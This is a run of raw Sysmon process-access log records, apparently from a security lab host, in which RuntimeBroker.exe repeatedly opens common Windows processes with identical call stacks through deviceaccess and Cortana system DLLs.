12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+5